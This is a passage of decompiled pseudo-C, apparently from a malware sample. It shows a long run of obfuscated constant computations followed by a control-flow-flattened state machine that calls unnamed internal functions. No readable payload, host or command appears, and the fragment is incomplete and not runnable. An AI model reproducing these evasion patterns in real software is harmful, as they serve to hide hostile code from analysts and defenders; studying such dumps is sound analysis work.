				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				unsigned int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				unsigned int _v676;
				signed int _t1259;
				signed int _t1287;
				signed int _t1299;
				signed int _t1310;
				signed int _t1340;
				signed int _t1341;
				signed int _t1343;
				signed int _t1344;
				signed int _t1345;
				signed int _t1346;
				signed int _t1347;
				signed int _t1348;
				signed int _t1349;
				signed int _t1350;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1365;
				signed int _t1384;
				signed int _t1465;
				signed int _t1466;
				signed int _t1469;
				signed int _t1482;
				signed int _t1495;
				signed int _t1498;
				void* _t1500;
				void* _t1504;
				void* _t1505;
				void* _t1506;

				_t1500 = (_t1498 & 0xfffffff8) - 0x2a0;
				_v548 = 0x612d76;
				_v548 = _v548 + 0xffffb226;
				_v548 = _v548 ^ 0x25733830;
				_v548 = _v548 + 0x94f7;
				_v548 = _v548 ^ 0x25147da1;
				_v608 = 0x8e6410;
				_v608 = _v608 | 0x5e5673b6;
				_v608 = _v608 ^ 0x9913f1ef;
				_v608 = _v608 * 0x3a;
				_t1469 = 0xe6d4a04;
				_v608 = _v608 ^ 0x4490702a;
				_v332 = 0x40e6a4;
				_v332 = _v332 ^ 0x1ba14b53;
				_v332 = _v332 ^ 0x1be1adf7;
				_v388 = 0xd7ca30;
				_t1343 = 0x42;
				_v388 = _v388 / _t1343;
				_v388 = _v388 + 0x3798;
				_v388 = _v388 ^ 0x000f1b75;
				_v216 = 0xd7fc5;
				_v216 = _v216 >> 1;
				_v216 = _v216 ^ 0x0004b337;
				_v516 = 0x59f14d;
				_v516 = _v516 >> 0xf;
				_t1344 = 0x4a;
				_v516 = _v516 / _t1344;
				_v516 = _v516 << 0xb;
				_v516 = _v516 ^ 0x00046054;
				_v304 = 0xedc603;
				_v304 = _v304 + 0xffffc02b;
				_v304 = _v304 ^ 0x00efeb53;
				_v232 = 0x637592;
				_t1465 = 0x6f;
				_t1345 = 0x31;
				_v232 = _v232 * 0x71;
				_v232 = _v232 ^ 0x2bef3074;
				_v372 = 0x919268;
				_v372 = _v372 << 9;
				_v372 = _v372 + 0x904f;
				_v372 = _v372 ^ 0x2324b0cf;
				_v484 = 0x568eb3;
				_v484 = _v484 * 0x42;
				_v484 = _v484 / _t1465;
				_v484 = _v484 ^ 0x0034ded9;
				_v472 = 0x365886;
				_v472 = _v472 << 0xc;
				_v472 = _v472 + 0xffff5d21;
				_v472 = _v472 ^ 0x6583ba5b;
				_v436 = 0xdfd34b;
				_v436 = _v436 / _t1345;
				_v436 = _v436 | 0x191717ac;
				_v436 = _v436 ^ 0x1914e100;
				_v196 = 0xd88df0;
				_t1346 = 0x15;
				_v196 = _v196 / _t1346;
				_v196 = _v196 ^ 0x0009e710;
				_v356 = 0xb64ed2;
				_v356 = _v356 >> 0xd;
				_t1340 = 0x1c;
				_t1347 = 0x51;
				_v356 = _v356 * 0x63;
				_v356 = _v356 ^ 0x0006dcaa;
				_v336 = 0x65c0e5;
				_v336 = _v336 * 0x7a;
				_v336 = _v336 >> 3;
				_v336 = _v336 ^ 0x060f054d;
				_v492 = 0x31a1;
				_v492 = _v492 ^ 0x5b528d22;
				_v492 = _v492 << 5;
				_v492 = _v492 ^ 0x6a59b43c;
				_v652 = 0x40a60;
				_v652 = _v652 | 0x6178721b;
				_v652 = _v652 + 0x8e9b;
				_v652 = _v652 / _t1340;
				_v652 = _v652 ^ 0x037a42dd;
				_v272 = 0xf0169f;
				_v272 = _v272 >> 5;
				_v272 = _v272 ^ 0x0004695a;
				_v528 = 0x24fae7;
				_v528 = _v528 ^ 0xfec3499d;
				_v528 = _v528 << 0xf;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0001af4c;
				_v188 = 0x9b8757;
				_v188 = _v188 >> 4;
				_v188 = _v188 ^ 0x000b2d6a;
				_v256 = 0x948fd;
				_v256 = _v256 ^ 0xf30bafdb;
				_v256 = _v256 ^ 0xf30b6e1f;
				_v464 = 0x93fe09;
				_v464 = _v464 / _t1347;
				_t1348 = 0x23;
				_v464 = _v464 * 0x7a;
				_v464 = _v464 ^ 0x00d327e8;
				_v648 = 0xd540cd;
				_v648 = _v648 * 0x5c;
				_v648 = _v648 >> 0xb;
				_v648 = _v648 / _t1348;
				_v648 = _v648 ^ 0x0005d45a;
				_v540 = 0x2acc1;
				_v540 = _v540 >> 7;
				_v540 = _v540 << 0x10;
				_t1349 = 0x59;
				_v540 = _v540 / _t1349;
				_v540 = _v540 ^ 0x000fef6f;
				_v264 = 0xfe7d93;
				_v264 = _v264 ^ 0x4bd787a7;
				_v264 = _v264 ^ 0x4b22b45d;
				_v208 = 0x23d5c9;
				_v208 = _v208 ^ 0x8f5a829d;
				_v208 = _v208 ^ 0x8f7555ae;
				_v524 = 0x2aaed2;
				_v524 = _v524 | 0x9661325e;
				_t1495 = 0x5c;
				_v524 = _v524 / _t1495;
				_v524 = _v524 * 0x63;
				_v524 = _v524 ^ 0xa1d330ca;
				_v612 = 0x173148;
				_v612 = _v612 >> 5;
				_v612 = _v612 + 0x14e7;
				_v612 = _v612 / _t1349;
				_v612 = _v612 ^ 0x0000773b;
				_v620 = 0xe48585;
				_v620 = _v620 << 0x10;
				_v620 = _v620 * 0x32;
				_v620 = _v620 >> 7;
				_v620 = _v620 ^ 0x0028030c;
				_v500 = 0xfd3bdc;
				_v500 = _v500 << 0xa;
				_v500 = _v500 ^ 0xf4e13163;
				_v520 = 0xe4fc5f;
				_v520 = _v520 + 0xa13e;
				_v520 = _v520 + 0xffff7828;
				_v520 = _v520 ^ 0x4d340404;
				_v520 = _v520 ^ 0x4dd63175;
				_v360 = 0x9532ce;
				_v360 = _v360 ^ 0xdad74cca;
				_v360 = _v360 | 0x8468d9e2;
				_v360 = _v360 ^ 0xde69f572;
				_v604 = 0x3a7c91;
				_v604 = _v604 | 0x10f1a45d;
				_v604 = _v604 + 0xffff6d1e;
				_v604 = _v604 | 0x776d764a;
				_v604 = _v604 ^ 0x77f7c5e5;
				_v212 = 0x6e3f57;
				_t279 =  &_v212; // 0x6e3f57
				_v212 =  *_t279 * 3;
				_v212 = _v212 ^ 0x01468193;
				_v220 = 0x58f789;
				_v220 = _v220 << 5;
				_v220 = _v220 ^ 0x0b1ef21b;
				_v236 = 0x737654;
				_v236 = _v236 + 0xe2b4;
				_v236 = _v236 ^ 0x0073a4da;
				_v416 = 0xc8c3a8;
				_v416 = _v416 ^ 0x4478b906;
				_v416 = _v416 * 0xc;
				_v416 = _v416 ^ 0x384ff3ff;
				_v576 = 0x407f47;
				_v576 = _v576 + 0x1a0d;
				_v576 = _v576 * 0x63;
				_v576 = _v576 << 2;
				_v576 = _v576 ^ 0x63e80fef;
				_v228 = 0x9b4b6;
				_v228 = _v228 + 0xffffd2d4;
				_v228 = _v228 ^ 0x000d2243;
				_v552 = 0xb96e33;
				_v552 = _v552 + 0x4381;
				_v552 = _v552 * 0xf;
				_v552 = _v552 + 0xffffbee9;
				_v552 = _v552 ^ 0x0ae545e5;
				_v560 = 0xe19e88;
				_v560 = _v560 | 0xc222c343;
				_v560 = _v560 / _t1465;
				_v560 = _v560 + 0x567c;
				_v560 = _v560 ^ 0x01c941bb;
				_v568 = 0xf463df;
				_v568 = _v568 | 0x401122c6;
				_v568 = _v568 >> 3;
				_v568 = _v568 | 0xf3373c61;
				_v568 = _v568 ^ 0xfb38c632;
				_v392 = 0xa88994;
				_v392 = _v392 >> 2;
				_v392 = _v392 + 0xfffffc92;
				_v392 = _v392 ^ 0x002883f3;
				_v544 = 0x16009;
				_v544 = _v544 ^ 0x700f0ae7;
				_v544 = _v544 << 0xd;
				_v544 = _v544 + 0xffffa581;
				_v544 = _v544 ^ 0xcd57c12d;
				_v400 = 0x4e3251;
				_v400 = _v400 << 0xd;
				_v400 = _v400 << 0xb;
				_v400 = _v400 ^ 0x510ef6f0;
				_v408 = 0xce49b4;
				_v408 = _v408 / _t1340;
				_v408 = _v408 | 0xa9ee0ad6;
				_v408 = _v408 ^ 0xa9ed29cd;
				_v368 = 0xfab4ff;
				_v368 = _v368 ^ 0x8bb4f731;
				_v368 = _v368 + 0x4788;
				_v368 = _v368 ^ 0x8b4dbddc;
				_v376 = 0x3b857d;
				_v376 = _v376 + 0xd8be;
				_v376 = _v376 ^ 0x0c7e0de1;
				_v376 = _v376 ^ 0x0c4b703c;
				_v384 = 0x702b67;
				_v384 = _v384 + 0x7016;
				_v384 = _v384 | 0xc6195e9d;
				_v384 = _v384 ^ 0xc67058d5;
				_v536 = 0xd092b2;
				_v536 = _v536 + 0xffff63c4;
				_v536 = _v536 | 0x81cb3080;
				_v536 = _v536 ^ 0x4ecdb7ae;
				_v536 = _v536 ^ 0xcf0bdc69;
				_v248 = 0xf8c39f;
				_v248 = _v248 | 0x0e89bf31;
				_v248 = _v248 ^ 0x0ef3b328;
				_v556 = 0x54f798;
				_v556 = _v556 >> 2;
				_v556 = _v556 ^ 0xd52f7ed0;
				_v556 = _v556 >> 6;
				_v556 = _v556 ^ 0x03531d7d;
				_v672 = 0xe1b7ad;
				_t1350 = 0x7a;
				_v672 = _v672 / _t1350;
				_v672 = _v672 << 0xc;
				_t1351 = 0xa;
				_v672 = _v672 / _t1351;
				_v672 = _v672 ^ 0x02f2c9f1;
				_v676 = 0xf0d76a;
				_v676 = _v676 >> 3;
				_v676 = _v676 + 0xffffb109;
				_v676 = _v676 >> 4;
				_v676 = _v676 ^ 0x0006f826;
				_v200 = 0xd1b71d;
				_t1352 = 0x7c;
				_v200 = _v200 / _t1352;
				_v200 = _v200 ^ 0x0006a6d0;
				_v596 = 0x496d6a;
				_t459 =  &_v596; // 0x496d6a
				_v596 =  *_t459 * 0x6b;
				_v596 = _v596 + 0xbb66;
				_v596 = _v596 + 0xffff602d;
				_v596 = _v596 ^ 0x1ebb8efb;
				_v404 = 0xf3863;
				_v404 = _v404 >> 0xe;
				_t1353 = 0x2a;
				_v404 = _v404 / _t1353;
				_v404 = _v404 ^ 0x00094758;
				_v476 = 0x611fd8;
				_v476 = _v476 | 0xb878f5dc;
				_v476 = _v476 + 0xad5b;
				_v476 = _v476 ^ 0xb87809fa;
				_v460 = 0xcf43a7;
				_v460 = _v460 ^ 0xdec9221b;
				_v460 = _v460 ^ 0xf00bdbd0;
				_v460 = _v460 ^ 0x2e089b39;
				_v340 = 0x6e2519;
				_v340 = _v340 + 0xffff23bc;
				_v340 = _v340 + 0xffffab38;
				_v340 = _v340 ^ 0x00658e81;
				_v468 = 0x6e95b3;
				_v468 = _v468 | 0xe42d871f;
				_v468 = _v468 + 0xffff0334;
				_v468 = _v468 ^ 0xe4661c95;
				_v184 = 0x976a3e;
				_v184 = _v184 >> 2;
				_v184 = _v184 ^ 0x002fb3e7;
				_v640 = 0xf929b2;
				_v640 = _v640 >> 4;
				_v640 = _v640 + 0x46ec;
				_t1354 = 0x4e;
				_v640 = _v640 * 0x14;
				_v640 = _v640 ^ 0x013b9ce5;
				_v288 = 0x293a87;
				_v288 = _v288 * 0x1a;
				_v288 = _v288 ^ 0x042f344b;
				_v300 = 0x77766c;
				_v300 = _v300 + 0xffff170c;
				_v300 = _v300 ^ 0x007d4cee;
				_v308 = 0x8e9aa4;
				_v308 = _v308 / _t1354;
				_v308 = _v308 ^ 0x00052c4e;
				_v456 = 0x218ab6;
				_v456 = _v456 / _t1340;
				_v456 = _v456 << 8;
				_v456 = _v456 ^ 0x0138796e;
				_v632 = 0x66de5e;
				_v632 = _v632 + 0xffff10e7;
				_v632 = _v632 << 8;
				_v632 = _v632 + 0xffffeb43;
				_v632 = _v632 ^ 0x65e84e4c;
				_v412 = 0x242a03;
				_v412 = _v412 << 3;
				_v412 = _v412 >> 4;
				_v412 = _v412 ^ 0x00169ab3;
				_v580 = 0x395796;
				_v580 = _v580 << 7;
				_v580 = _v580 >> 9;
				_v580 = _v580 + 0xb065;
				_v580 = _v580 ^ 0x000e083d;
				_v192 = 0xd019c8;
				_t1355 = 0x29;
				_v192 = _v192 / _t1355;
				_v192 = _v192 ^ 0x000d0418;
				_v364 = 0x5114b6;
				_v364 = _v364 << 9;
				_v364 = _v364 << 0xf;
				_v364 = _v364 ^ 0xb6040cfd;
				_v452 = 0xdc8bb5;
				_v452 = _v452 ^ 0xb07e6e5f;
				_v452 = _v452 << 0xe;
				_v452 = _v452 ^ 0xb9795724;
				_v572 = 0xdefa33;
				_v572 = _v572 + 0xae39;
				_t1356 = 0x16;
				_v572 = _v572 * 0x56;
				_v572 = _v572 * 0x33;
				_v572 = _v572 ^ 0xf7eaa6cf;
				_v280 = 0x106c99;
				_v280 = _v280 ^ 0xf1e2e143;
				_v280 = _v280 ^ 0xf1f1647c;
				_v444 = 0x12ba83;
				_v444 = _v444 + 0xffff2e0b;
				_v444 = _v444 | 0x954218b9;
				_v444 = _v444 ^ 0x95501631;
				_v636 = 0x6f6552;
				_v636 = _v636 * 0x3a;
				_v636 = _v636 * 0x63;
				_v636 = _v636 ^ 0xc29eccb8;
				_v508 = 0x9979f;
				_v508 = _v508 >> 3;
				_v508 = _v508 + 0xffff8ecf;
				_v508 = _v508 ^ 0x0008ebd3;
				_v504 = 0x338317;
				_v504 = _v504 + 0xffff3917;
				_v504 = _v504 >> 1;
				_v504 = _v504 ^ 0x001e4512;
				_v420 = 0x2775fd;
				_v420 = _v420 / _t1356;
				_v420 = _v420 | 0x1f6013d3;
				_v420 = _v420 ^ 0x1f654eff;
				_v656 = 0x7dcf58;
				_v656 = _v656 ^ 0x77b5ed19;
				_v656 = _v656 + 0x312f;
				_v656 = _v656 << 0xe;
				_v656 = _v656 ^ 0x14d47f34;
				_v488 = 0x685995;
				_v488 = _v488 >> 9;
				_v488 = _v488 + 0xe674;
				_v488 = _v488 ^ 0x000367d5;
				_v328 = 0x4f2a8a;
				_t1357 = 0x30;
				_v328 = _v328 * 0x6c;
				_v328 = _v328 ^ 0x2165dbb2;
				_v664 = 0xf8ddee;
				_v664 = _v664 + 0xffffc10e;
				_v664 = _v664 + 0x5798;
				_v664 = _v664 | 0xdb7e095f;
				_v664 = _v664 ^ 0xdbfa1ad3;
				_v616 = 0xdf2722;
				_v616 = _v616 << 0x10;
				_v616 = _v616 << 0xf;
				_v616 = _v616 << 5;
				_v616 = _v616 ^ 0x0003a7ab;
				_v284 = 0x367b22;
				_t693 =  &_v284; // 0x367b22
				_v284 =  *_t693 / _t1357;
				_v284 = _v284 ^ 0x00041d99;
				_v292 = 0xfb329f;
				_v292 = _v292 + 0xffffce68;
				_v292 = _v292 ^ 0x00fc3f30;
				_v624 = 0xe6983f;
				_v624 = _v624 * 0x70;
				_v624 = _v624 ^ 0x3704df59;
				_v624 = _v624 * 9;
				_v624 = _v624 ^ 0xf3155be5;
				_v260 = 0xc363a2;
				_v260 = _v260 ^ 0x1025f5e4;
				_v260 = _v260 ^ 0x10ec772f;
				_v268 = 0x606a55;
				_v268 = _v268 >> 3;
				_v268 = _v268 ^ 0x000fc817;
				_v600 = 0xd902a;
				_v600 = _v600 >> 0xb;
				_v600 = _v600 << 1;
				_v600 = _v600 << 6;
				_v600 = _v600 ^ 0x00039c6b;
				_v276 = 0xc6f76b;
				_v276 = _v276 + 0xc129;
				_v276 = _v276 ^ 0x00cee0d7;
				_v440 = 0x65c4cc;
				_v440 = _v440 ^ 0xf07a0639;
				_t1358 = 0x69;
				_v440 = _v440 * 0x5f;
				_v440 = _v440 ^ 0x1bc0a904;
				_v584 = 0x39d860;
				_v584 = _v584 * 0x58;
				_v584 = _v584 + 0x4905;
				_v584 = _v584 * 0x2a;
				_v584 = _v584 ^ 0x432fbf1f;
				_v448 = 0xf8616a;
				_v448 = _v448 >> 4;
				_v448 = _v448 + 0xfd7e;
				_v448 = _v448 ^ 0x0010392b;
				_v244 = 0x3f99e5;
				_v244 = _v244 | 0x57277205;
				_v244 = _v244 ^ 0x57370e4e;
				_v348 = 0xf9a67d;
				_v348 = _v348 + 0xffff1738;
				_v348 = _v348 + 0xa0df;
				_v348 = _v348 ^ 0x00f7be80;
				_v564 = 0x164474;
				_v564 = _v564 + 0xffff8d5e;
				_v564 = _v564 | 0xc2a179fa;
				_v564 = _v564 / _t1358;
				_v564 = _v564 ^ 0x01d1c3a4;
				_v668 = 0xe03ad;
				_v668 = _v668 + 0xffffcc8a;
				_t1359 = 0x3c;
				_v668 = _v668 / _t1359;
				_v668 = _v668 | 0xd2e9204d;
				_v668 = _v668 ^ 0xd2e45507;
				_v532 = 0xe9adcf;
				_v532 = _v532 + 0xffffcf22;
				_v532 = _v532 + 0xfffffe50;
				_t1360 = 0x7b;
				_v532 = _v532 / _t1360;
				_v532 = _v532 ^ 0x000617c2;
				_v204 = 0x5a4d2e;
				_v204 = _v204 + 0xffff4d75;
				_v204 = _v204 ^ 0x00531e36;
				_v224 = 0xf2d317;
				_v224 = _v224 * 3;
				_v224 = _v224 ^ 0x02d347bf;
				_v644 = 0xc36dbf;
				_v644 = _v644 + 0xffff71a3;
				_v644 = _v644 | 0x544094bf;
				_v644 = _v644 + 0x4309;
				_v644 = _v644 ^ 0x54c28134;
				_v296 = 0xcf1d90;
				_v296 = _v296 | 0x31ca05e0;
				_v296 = _v296 ^ 0x31c90339;
				_v588 = 0xc34a2d;
				_v588 = _v588 >> 8;
				_v588 = _v588 >> 4;
				_v588 = _v588 + 0x75c1;
				_v588 = _v588 ^ 0x000d315f;
				_v240 = 0xeb7d33;
				_v240 = _v240 + 0xffffc753;
				_v240 = _v240 ^ 0x00e8d488;
				_v180 = 0x669bed;
				_v180 = _v180 / _t1495;
				_v180 = _v180 ^ 0x0002c9fb;
				_v496 = 0xfe0b00;
				_v496 = _v496 ^ 0x5fe703de;
				_v496 = _v496 << 6;
				_v496 = _v496 ^ 0xc645a863;
				_v660 = 0x916252;
				_v660 = _v660 >> 3;
				_v660 = _v660 << 0xd;
				_v660 = _v660 + 0xffff7dae;
				_v660 = _v660 ^ 0x458d7e10;
				_v320 = 0x2cf738;
				_v320 = _v320 | 0xc975dcc7;
				_v320 = _v320 ^ 0xc9795cda;
				_v312 = 0xb1d1ee;
				_v312 = _v312 + 0xffff51df;
				_v312 = _v312 ^ 0x00b16bbb;
				_v344 = 0x3e092b;
				_v344 = _v344 >> 2;
				_v344 = _v344 << 0xe;
				_v344 = _v344 ^ 0xe09a27cb;
				_v352 = 0x68a1a;
				_v352 = _v352 + 0xc791;
				_v352 = _v352 | 0x7642bfae;
				_v352 = _v352 ^ 0x76458494;
				_v512 = 0xe86ea0;
				_v512 = _v512 + 0xf959;
				_v512 = _v512 | 0x4e18ffd8;
				_t1361 = 0x17;
				_v512 = _v512 / _t1361;
				_v512 = _v512 ^ 0x036c12f7;
				_v396 = 0xe760c6;
				_t1362 = 0x26;
				_v396 = _v396 * 0x31;
				_v396 = _v396 * 0x56;
				_v396 = _v396 ^ 0xe1869eee;
				_v316 = 0x7a30c6;
				_v316 = _v316 / _t1362;
				_v316 = _v316 ^ 0x0003103d;
				_v628 = 0x4f3273;
				_t1363 = 0x78;
				_v628 = _v628 / _t1363;
				_v628 = _v628 << 0xa;
				_v628 = _v628 ^ 0x53aad572;
				_v628 = _v628 ^ 0x51090573;
				_v380 = 0x21784b;
				_v380 = _v380 << 7;
				_v380 = _v380 << 9;
				_v380 = _v380 ^ 0x784b0fa0;
				_v428 = 0xd8c839;
				_v428 = _v428 + 0x77d0;
				_v428 = _v428 >> 2;
				_v428 = _v428 ^ 0x00364f42;
				_v324 = 0x188352;
				_v324 = _v324 + 0xffffa07e;
				_v324 = _v324 ^ 0x00159870;
				_v252 = 0xe98be6;
				_v252 = _v252 >> 2;
				_v252 = _v252 ^ 0x0037d959;
				_v480 = 0xa4f1f5;
				_t1364 = 0x59;
				_t1466 = _v500;
				_v480 = _v480 / _t1364;
				_v480 = _v480 + 0xffff7faf;
				_v480 = _v480 ^ 0x000fae01;
				_v592 = 0x82c23d;
				_v592 = _v592 + 0x5741;
				_v592 = _v592 ^ 0x9a18022a;
				_v592 = _v592 << 0x10;
				_v592 = _v592 ^ 0x1b5af420;
				_v424 = 0x341aa7;
				_v424 = _v424 | 0xfb8ffeba;
				_v424 = _v424 ^ 0xfbbf8b8f;
				_v432 = 0xf44743;
				_t1365 = 0x76;
				_t1341 = _v500;
				_v432 = _v432 / _t1365;
				_v432 = _v432 / _t1365;
				_v432 = _v432 ^ 0x0000ee1d;
				goto L1;
				do {
					while(1) {
						L1:
						_t1504 = _t1469 - 0x856f9ca;
						if(_t1504 <= 0) {
						}
						L2:
						if(_t1504 == 0) {
							_t1259 = E040E27F9();
							L113:
							return _t1259;
						}
						_t1505 = _t1469 - 0x39ddd07;
						if(_t1505 > 0) {
							__eflags = _t1469 - 0x5c221fd;
							if(__eflags > 0) {
								__eflags = _t1469 - 0x627e178;
								if(_t1469 == 0x627e178) {
									_t1259 = E040F2009();
									_t1469 = 0xa51fadb;
									while(1) {
										L1:
										_t1504 = _t1469 - 0x856f9ca;
										if(_t1504 <= 0) {
										}
										goto L54;
									}
									goto L2;
								}
								__eflags = _t1469 - 0x6362904;
								if(_t1469 == 0x6362904) {
									_t1259 = E040D4B5D();
									_t1469 = 0x223c7a9;
									continue;
								}
								__eflags = _t1469 - 0x7a1cd5a;
								if(_t1469 == 0x7a1cd5a) {
									E040EE955();
									_t1259 = E040ED111();
									asm("sbb esi, esi");
									_t1469 = ( ~_t1259 & 0x02cd2b2b) + 0x6362904;
									continue;
								}
								__eflags = _t1469 - 0x8488c7d;
								if(_t1469 != 0x8488c7d) {
									break;
								}
								_t1259 = E040DDE74();
								asm("sbb esi, esi");
								_t1469 = ( ~_t1259 & 0x060e21f6) + 0x19bf82;
								continue;
							}
							if(__eflags == 0) {
								_t1259 = E040E3EAA();
								asm("sbb esi, esi");
								_t1482 =  ~_t1259 & 0xf8bf9ea4;
								L21:
								_t1469 = _t1482 + 0x9642905;
								continue;
							}
							__eflags = _t1469 - 0x41f7676;
							if(__eflags == 0) {
								_t1259 = E040DBDF9(__eflags);
								__eflags = _t1259;
								if(_t1259 == 0) {
									goto L113;
								}
								_t1469 = 0x22d34a3;
								continue;
							}
							__eflags = _t1469 - 0x4c22f24;
							if(_t1469 == 0x4c22f24) {
								_t1259 = E040ED1BC( &_v152, _v628, _v572, _v280, _v444,  &_v160, _v636, E040DA40E());
								_t1500 = _t1500 + 0x18;
								asm("sbb esi, esi");
								_t1469 = ( ~_t1259 & 0x068737c2) + 0x4c22f24;
								continue;
							}
							__eflags = _t1469 - 0x4d97dbc;
							if(_t1469 == 0x4d97dbc) {
								_t1259 = _v396;
								_t1469 = 0xcbac970;
								_v84 = _t1259;
								continue;
							}
							__eflags = _t1469 - 0x4f2172b;
							if(_t1469 != 0x4f2172b) {
								break;
							}
							_v24 = E040EC37E();
							_t1259 = E040EBD13(_t1279, _v460, _v340, _v468, _v184);
							_t1500 = _t1500 + 0xc;
							_v20 = _t1259;
							_t1469 = 0xba8c9c0;
							continue;
						}
						if(_t1505 == 0) {
							_t1259 = E040F0E63();
							__eflags = _t1259;
							if(_t1259 == 0) {
								goto L113;
							}
							_t1469 = 0xb3966a4;
							continue;
						}
						_t1506 = _t1469 - 0x1db8a88;
						if(_t1506 > 0) {
							__eflags = _t1469 - 0x223c7a9;
							if(_t1469 == 0x223c7a9) {
								_t1259 = E040F17BD(_v500, _v520, _v360);
								goto L113;
							}
							__eflags = _t1469 - 0x22d34a3;
							if(_t1469 == 0x22d34a3) {
								_t1259 = E040F2699();
								_t1469 = 0xa8d90c;
								continue;
							}
							__eflags = _t1469 - 0x282f66e;
							if(_t1469 == 0x282f66e) {
								_t1259 = E040D30E7();
								_v88 = _t1259;
								_t1469 = 0xc53db32;
								continue;
							}
							__eflags = _t1469 - 0x32638c6;
							if(_t1469 != 0x32638c6) {
								break;
							}
							_t1259 = E040F2B09(_v224, _v152, _v644, _v296);
							L29:
							_t1469 = 0x18cfb4a;
							continue;
						}
						if(_t1506 == 0) {
							_t1259 = E040D77A3( &_v152, _v412, _v580, _v192,  &_v100);
							_t1500 = _t1500 + 0xc;
							asm("sbb esi, esi");
							_t1469 = ( ~_t1259 & 0x019bf65e) + 0x32638c6;
							continue;
						}
						if(_t1469 == 0x19bf82) {
							_t1287 = E040D670B();
							__eflags = _t1287;
							if(_t1287 == 0) {
								_t1259 = E040ED111();
								asm("sbb esi, esi");
								_t1469 = ( ~_t1259 & 0x05b25150) + 0x8c2c3ca;
								continue;
							}
							_t1259 = E040ED111();
							asm("sbb esi, esi");
							_t1482 =  ~_t1259 & 0xfc5df8f8;
							__eflags = _t1482;
							goto L21;
						}
						if(_t1469 == 0xa8d90c) {
							_t1259 = E040E2142();
							__eflags = _t1259;
							if(_t1259 == 0) {
								goto L113;
							}
							_t1469 = 0x39ddd07;
							continue;
						}
						if(_t1469 == 0x18cfb4a) {
							__eflags = _t1466 - _v332;
							if(_t1466 == _v332) {
								L16:
								_t1469 = _t1341;
								break;
							}
							_t1259 = E040F1028(_v180, _v496, E040DA40E(), _t1466, _v660, _v320);
							_t1500 = _t1500 + 0x10;
							__eflags = _t1259 - _v548;
							if(_t1259 == _v548) {
								_t1259 = E040E4F74();
								goto L16;
							} else {
								_t1469 = 0x892c27a;
								continue;
							}
						}
						if(_t1469 != 0x19b3c55) {
							break;
						} else {
							_t1259 = E040F2B09(_v668, _v160, _v532, _v204);
							_t1469 = 0x32638c6;
							continue;
						}
						L54:
						__eflags = _t1469 - 0xba8c9c0;
						if(__eflags > 0) {
							__eflags = _t1469 - 0xe6d4a04;
							if(__eflags > 0) {
								__eflags = _t1469 - 0xe75151a;
								if(_t1469 == 0xe75151a) {
									E040DA445();
									_t1469 = 0x8c2c3ca;
									break;
								}
								__eflags = _t1469 - 0xea72fdd;
								if(_t1469 == 0xea72fdd) {
									_t1259 = E040E8D3D();
									_t1469 = 0xee19950;
									continue;
								}
								__eflags = _t1469 - 0xee19950;
								if(__eflags == 0) {
									_v168 = E040E3D85(_v236, 0x40d1248, __eflags,  &_v164, _v416);
									_v176 = E040E3D85(_v576, 0x40d12a8, __eflags,  &_v172, _v228);
									_t1299 = E040E9A01( &_v176,  &_v168, _v552, _v560, _v568);
									asm("sbb esi, esi");
									_t1469 = ( ~_t1299 & 0x03fcb1a4) + 0x75265a3;
									E040EFECB(_v176, _v392, _v544, _v400, _v408);
									_t1259 = E040EFECB(_v168, _v368, _v376, _v384, _v536);
									_t1500 = _t1500 + 0x34;
								}
								break;
							}
							if(__eflags == 0) {
								_t1469 = 0x41f7676;
								continue;
							}
							__eflags = _t1469 - 0xc031f76;
							if(_t1469 == 0xc031f76) {
								_t1384 = _v616;
								_t1259 = E040EE4E5(_v284,  &_v108, _v292, _v624);
								_t1500 = _t1500 + 0xc;
								__eflags = _t1259;
								if(_t1259 == 0) {
									_t1259 = _v144;
									__eflags = _t1259;
									if(_t1259 == 0) {
										_push(_t1384);
										_push(_t1384);
										_t1466 = E040ECCA0(_v252, _v592);
										_t1500 = _t1500 + 0x10;
										_t1259 = _v144;
									}
									__eflags = _t1259 - 1;
									if(_t1259 == 1) {
										_push(_t1384);
										_push(_t1384);
										_t1259 = E040ECCA0(_v424, _v432);
										_t1500 = _t1500 + 0x10;
										_t1466 = _t1259;
									}
								} else {
									_t1466 = _v608;
								}
								_t1341 = 0xc4fb15d;
								_t1469 = 0x92191f9;
								continue;
							}
							__eflags = _t1469 - 0xc4fb15d;
							if(_t1469 == 0xc4fb15d) {
								_t1259 = E040D5386(_v456,  &_v56, _v632);
								_pop(_t1384);
								_t1469 = 0x1db8a88;
								continue;
							}
							__eflags = _t1469 - 0xc53db32;
							if(_t1469 == 0xc53db32) {
								_t1259 = E040EC387(_t1384);
								_v92 = _t1259;
								_t1469 = 0x4d97dbc;
								continue;
							}
							__eflags = _t1469 - 0xcbac970;
							if(_t1469 != 0xcbac970) {
								break;
							}
							_t1259 = _v316;
							_t1469 = 0xc4fb15d;
							_v44 = _t1259;
							continue;
						}
						if(__eflags == 0) {
							_t1259 = E040DF8A0();
							_v12 = _t1259;
							_t1469 = 0x282f66e;
							continue;
						}
						__eflags = _t1469 - 0x9642905;
						if(__eflags > 0) {
							__eflags = _t1469 - 0xa51fadb;
							if(_t1469 == 0xa51fadb) {
								_t1259 = E040EAD08();
								__eflags = _t1259;
								if(_t1259 == 0) {
									goto L113;
								}
								_t1469 = 0x7a1cd5a;
								continue;
							}
							__eflags = _t1469 - 0xb3966a4;
							if(_t1469 == 0xb3966a4) {
								_t1259 = E040E4A66();
								__eflags = _t1259;
								if(_t1259 == 0) {
									goto L113;
								}
								_t1469 = 0x8488c7d;
								continue;
							}
							__eflags = _t1469 - 0xb4966e6;
							if(_t1469 == 0xb4966e6) {
								_t1384 = _v508;
								_t1310 = E040D55FF(_t1384, _v504, _v420,  &_v160,  &_v144);
								_t1500 = _t1500 + 0xc;
								__eflags = _t1310;
								if(_t1310 != 0) {
									_t1259 = _v144;
									__eflags = _t1259 - 8;
									if(_t1259 != 8) {
										__eflags = _t1259;
										if(_t1259 == 0) {
											L79:
											_t1469 = 0xc031f76;
											continue;
